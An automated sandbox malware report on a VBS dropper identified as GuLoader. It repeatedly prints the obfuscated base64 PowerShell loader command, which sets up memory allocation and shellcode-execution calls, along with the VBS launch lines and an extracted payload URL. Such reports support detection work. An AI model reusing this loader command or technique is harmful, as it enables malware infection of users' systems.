GYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAGkAYQBzAHUAcwBpACAAcABpAGwAdABzAHQAIABPAG0AcwBvAHIAZwBzAGMAZQAgA
    Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132878514567671740.5612.DefaultAppDomain.powershell

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Found malware configuration
    Source: 00000003.00000002.1189973609.00000000098B0000.00000040.00000800.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://onedrive.live.com/download?cidO"}

    Networking

    barindex
    Potential malicious VBS script found (has network functionality)
    Source: Initial file: D_Stream.SaveToFile Gefullte5, 2
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: https://onedrive.live.com/download?cidO
    Source: powershell.exe, 00000003.00000002.1184479242.0000000006014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000003.00000002.1180651928.00000000050F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000003.00000002.1180399057.0000000004FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000003.00000002.1180651928.00000000050F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000003.00000002.1184479242.0000000006014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000003.00000002.1184479242.0000000006014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000003.00000002.1184479242.0000000006014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000003.00000002.1180651928.00000000050F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000003.00000002.1184479242.0000000006014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

    System Summary

    barindex
    Wscript starts Powershell (via cmd or directly)
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAGkAYQBzAHUAcwBpACAAc
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAGkAYQBzAHUAcwBpACAAcJump to behavior
    Potential malicious VBS script found (suspicious strings)
    Source: Initial file: obj1.ShellExecute MyFile , INTENS ,"","",0
    Source: Initial file: obj1.ShellExecute "powershell.exe", INTENS ,"","",0
    Very long command line found
    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7389
    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7389Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_033CE7C83_2_033CE7C8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07E6BF183_2_07E6BF18
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 98%
    Source: IMG 0045434.vbsInitial sample: Strings found which are bigger than 50
    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\IMG 0045434.vbs"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAGkAYQBzAHUAcwBpACAAc
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7F9.tmp" "c:\Users\user\AppData\Local\Temp\ridmj1ad\CSC3DE241659FC44F82A3F695B8E7FD432F.TMP"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAGkAYQBzAHUAcwBpACAAcJump to behavior
